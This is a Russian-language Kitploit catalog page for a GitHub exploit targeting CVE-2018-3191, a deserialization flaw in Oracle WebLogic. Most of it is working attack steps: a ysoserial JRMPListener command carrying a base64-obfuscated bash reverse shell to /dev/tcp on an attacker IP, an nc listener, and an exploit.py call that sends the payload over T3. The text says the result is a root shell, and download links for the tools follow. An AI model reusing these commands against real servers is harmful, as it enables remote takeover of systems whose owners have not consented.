Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-3191 — CVE-2018-3191 反弹shell | Kitploit
Инструменты/GitHubGitHub/libraggbond/cve-2018-3191
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublibraggbond/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 反弹shell

Репозиторий
63297 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-3191

CVE-2018-3191 обратная оболочка Локальный IP: 172.16.38.1 Weblogic: 172.16.38.174:7001

  1. Локальное выполнение: java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

Затем выполнить nc -lvv 7777

(1) Команда bash, чтобы избежать экранирования специальных символов при выполнении Runtime.getRuntime().exec(), была закодирована и декодирована в base64. Открытый текст: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Эта операция запускает локальный JRMPListener, который принимает запросы от атакуемого WebLogic и выполняет указанную команду bash для обратного подключения. (3) Nc прослушивает порт 7777 в ожидании обратного подключения bash от хоста WebLogic.

  1. Выполнение: python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, используя уязвимость, заставляет WebLogic обратиться к удаленному RMI-сервису и выполнить команду bash для обратного подключения.

  2. Порт, прослушиваемый nc, получает обратную оболочку bash с правами root.

Необходимые инструменты: ysoserial-master.jar // Инструмент для эксплуатации десериализации https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // Генератор полезной нагрузки CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // Инструмент для отправки по протоколу T3 WebLogic, интегрирующий полезную нагрузку CVE-2018-3191

Скачать инструмент